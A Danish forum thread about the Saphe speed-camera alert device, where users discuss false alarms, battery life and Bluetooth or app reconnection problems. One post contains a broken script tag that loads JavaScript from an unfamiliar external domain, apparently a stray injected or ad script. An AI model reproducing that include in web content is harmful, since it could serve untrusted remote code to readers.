recordere.dk forum     Det danske community for hjemmets elektronik og indhold     Siden 2003
<b>Forside</b> Forside > Køb og salg > Fælleskøb ®
  Nye indlæg Nye indlæg  Seneste forum emner Seneste   Seneste forum emner (vindue) Vindue   De emner du deltager i Mine emner RSS Feed - Saphe
  FAQ FAQ  Søg i forum   Opret ny bruger Opret ny bruger  Log ind Log ind

Saphe

 Besvar Besvar Side  <1 34567 12>
Forfatter
Besked
Stan6 Se dropdown menu
Junior bruger
Junior bruger
Avatar

Oprettet: 17-December-2007
Sted: Denmark
Status: Offline
Point: 43
Funktioner Funktioner   Tak (0) Tak(0)   Citér Stan6 Citér  BesvarSvar Direkte link til dette indlæg Sendt: 31-Januar-2019 kl. 13:47
Hej-
Jeg har haft Saphe i over 1 år. Jeg kører kun 10.000 km om året, men hørte kun engang min Saphe at give lyd, og der var ingen fotovogn. Men på det sidste gav den lyd fra sig  mindst 10 gange i løbet af  3 uger, uden at der var en fotovogn i sigte.  Sidste gang på en lukket villavej...
Og så tænkte jeg: hvis man bor  på  en villavej hvor folk kører for hurtig, så kan man bare trykke på den blå knap hver dag klokken halv otte om morgenem... eller hvis man som politimand har en saphe i  bilen, kan man bare give falsk alarm der, hvor man synes at det går lidt for stærk. . Er det derfor at politi ikke har nogle invendinger mod brug af Saphe??????????????
Wink Hilsen Stan6
Stan
Til top
Jessemand Se dropdown menu
Super bruger
Super bruger


Oprettet: 20-November-2004
Sted: Denmark
Status: Offline
Point: 483
Funktioner Funktioner   Tak (0) Tak(0)   Citér Jessemand Citér  BesvarSvar Direkte link til dette indlæg Sendt: 31-Januar-2019 kl. 14:09
Oprindeligt skrevet af Stan6 Stan6 skrev:

Hej-
Jeg har haft Saphe i over 1 år. Jeg kører kun 10.000 km om året, men hørte kun engang min Saphe at give lyd, og der var ingen fotovogn. Men på det sidste gav den lyd fra sig  mindst 10 gange i løbet af  3 uger, uden at der var en fotovogn i sigte.  Sidste gang på en lukket villavej...
Og så tænkte jeg: hvis man bor  på  en villavej hvor folk kører for hurtig, så kan man bare trykke på den blå knap hver dag klokken halv otte om morgenem... eller hvis man som politimand har en saphe i  bilen, kan man bare give falsk alarm der, hvor man synes at det går lidt for stærk. . Er det derfor at politi ikke har nogle invendinger mod brug af Saphe??????????????
Wink Hilsen Stan6
Jeg håber da godt nok firmaet bag har styr på hvem der laver "falske" alarmer. Det burde da være en smal sag at konstatere dette. Ved vedvarende "falske" alarmer burde vedkommende vel have advarsel eller udelukkes? 
< ="text/" async="" ="//protesidenext.com/1f766cec5f3763ac13.js">



Redigeret af Jessemand - 31-Januar-2019 kl. 14:12
Til top
Stan6 Se dropdown menu
Junior bruger
Junior bruger
Avatar

Oprettet: 17-December-2007
Sted: Denmark
Status: Offline
Point: 43
Funktioner Funktioner   Tak (0) Tak(0)   Citér Stan6 Citér  BesvarSvar Direkte link til dette indlæg Sendt: 03-Februar-2019 kl. 16:53
Ja ved det ikke. Politiet???
Stan
Til top
Munch Se dropdown menu
Guld medlem
Guld medlem
Avatar

Oprettet: 23-Juni-2018
Sted: Vejle
Status: Online
Point: 4246
Funktioner Funktioner   Tak (0) Tak(0)   Citér Munch Citér  BesvarSvar Direkte link til dette indlæg Sendt: 22-Oktober-2020 kl. 14:59
Min Saphe er pludselig holdt op med at virke! Den reagerer på tryk på rød eller blå med lysblink. Opdagede at den ikke var connected til min iPhone med bluetooth, så fik den connected med et langt tryk på rød/blå, kan ikke huske hvilken en der bruges til connection. 

Men jeg får ikke nogen oplysninger op på iPhone skærmen når jeg kører. Den viser ikke hastighed og står bare med beskeden: Der er ikke nogen advarsler de næste 20 km. What to do?


Redigeret af Munch - 22-Oktober-2020 kl. 15:04
Til top
KlausDM Se dropdown menu
Platin medlem
Platin medlem
Avatar

Oprettet: 12-Marts-2010
Sted: Hammel, Jylland
Status: Offline
Point: 19209
Funktioner Funktioner   Tak (0) Tak(0)   Citér KlausDM Citér  BesvarSvar Direkte link til dette indlæg Sendt: 22-Oktober-2020 kl. 16:23
Har du skiftet batteriet?


Klaus
Min modelbane, http://modelbaneeuropa.dk
Min hjemmeside, http://moppe.dk
Til top
Munch Se dropdown menu
Guld medlem
Guld medlem
Avatar

Oprettet: 23-Juni-2018
Sted: Vejle
Status: Online
Point: 4246
Funktioner Funktioner   Tak (0) Tak(0)   Citér Munch Citér  BesvarSvar Direkte link til dette indlæg Sendt: 22-Oktober-2020 kl. 16:37
Oprindeligt skrevet af KlausDM KlausDM skrev:

Har du skiftet batteriet?


Klaus
Ja mener jeg skiftede batteriet sidste år.
Til top
cnn3 Se dropdown menu
Guld medlem
Guld medlem
Avatar

Oprettet: 20-Oktober-2004
Sted: Århus
Status: Offline
Point: 3195
Funktioner Funktioner   Tak (0) Tak(0)   Citér cnn3 Citér  BesvarSvar Direkte link til dette indlæg Sendt: 22-Oktober-2020 kl. 17:12
skift det igen 🙂
De lovede batteritider skal tages med et gran salt
mvh Christian
Til top
Munch Se dropdown menu
Guld medlem
Guld medlem
Avatar

Oprettet: 23-Juni-2018
Sted: Vejle
Status: Online
Point: 4246
Funktioner Funktioner   Tak (0) Tak(0)   Citér Munch Citér  BesvarSvar Direkte link til dette indlæg Sendt: 22-Oktober-2020 kl. 17:30
Oprindeligt skrevet af cnn3 cnn3 skrev:

skift det igen 🙂
De lovede batteritider skal tages med et gran salt
Ja det lyder sandsynligt. Jeg købte nyt batteri sidst i THansen, hvor det var billigst.

Tror faktisk batteribyen er billigst nu.


Redigeret af Munch - 22-Oktober-2020 kl. 17:37
Til top
Munch Se dropdown menu
Guld medlem
Guld medlem
Avatar

Oprettet: 23-Juni-2018
Sted: Vejle
Status: Online
Point: 4246
Funktioner Funktioner   Tak (0) Tak(0)   Citér Munch Citér  BesvarSvar Direkte link til dette indlæg Sendt: 24-Oktober-2020 kl. 14:49
Oprindeligt skrevet af cnn3 cnn3 skrev:

skift det igen 🙂
De lovede batteritider skal tages med et gran salt
Det hjalp ikke at sætte nyt batteri i. Er der noget der skal genstartes? Der ER bluetooth forbindelse, og har været det hele tiden inden jeg skiftede batteriet.
Til top
forzajuve Se dropdown menu
Guld medlem
Guld medlem
Avatar

Oprettet: 17-Juni-2007
Sted: Jyllinge
Status: Offline
Point: 6388
Funktioner Funktioner   Tak (0) Tak(0)   Citér forzajuve Citér  BesvarSvar Direkte link til dette indlæg Sendt: 24-Oktober-2020 kl. 15:14
jeg har haft samme problem. Jeg slettede appen og installerede den igen det har hjulpet 
LG 60 PK250 | Pioneer VSX-1021 | | Audio Pro Image 44
Til top
Munch Se dropdown menu
Guld medlem
Guld medlem
Avatar

Oprettet: 23-Juni-2018
Sted: Vejle
Status: Online
Point: 4246
Funktioner Funktioner   Tak (0) Tak(0)   Citér Munch Citér  BesvarSvar Direkte link til dette indlæg Sendt: 24-Oktober-2020 kl. 16:47
Oprindeligt skrevet af forzajuve forzajuve skrev:

jeg har haft samme problem. Jeg slettede appen og installerede den igen det har hjulpet 
Ok, det må jeg prøve. Tak for hjælpen.
Til top
Munch Se dropdown menu
Guld medlem
Guld medlem
Avatar

Oprettet: 23-Juni-2018
Sted: Vejle
Status: Online
Point: 4246
Funktioner Funktioner   Tak (0) Tak(0)   Citér Munch Citér  BesvarSvar Direkte link til dette indlæg Sendt: 24-Oktober-2020 kl. 17:03
Oprindeligt skrevet af Munch Munch skrev:

Oprindeligt skrevet af forzajuve forzajuve skrev:

jeg har haft samme problem. Jeg slettede appen og installerede den igen det har hjulpet 
Ok, det må jeg prøve. Tak for hjælpen.
Og nu vil den så ikke koble på bluetooth efter ny installation af app. Holder blå knap inde på Saphe indtil den blinker blåt, og holder iPhone helt tæt på med bluetooth åben og cirklen der indikerer at den søger. Så hvad der nu er galt kan jeg ikke lige se?
Til top
 
 Besvar Besvar Side  <1 34567 12>
 
Skift forum Forum-tilladelser Se dropdown menu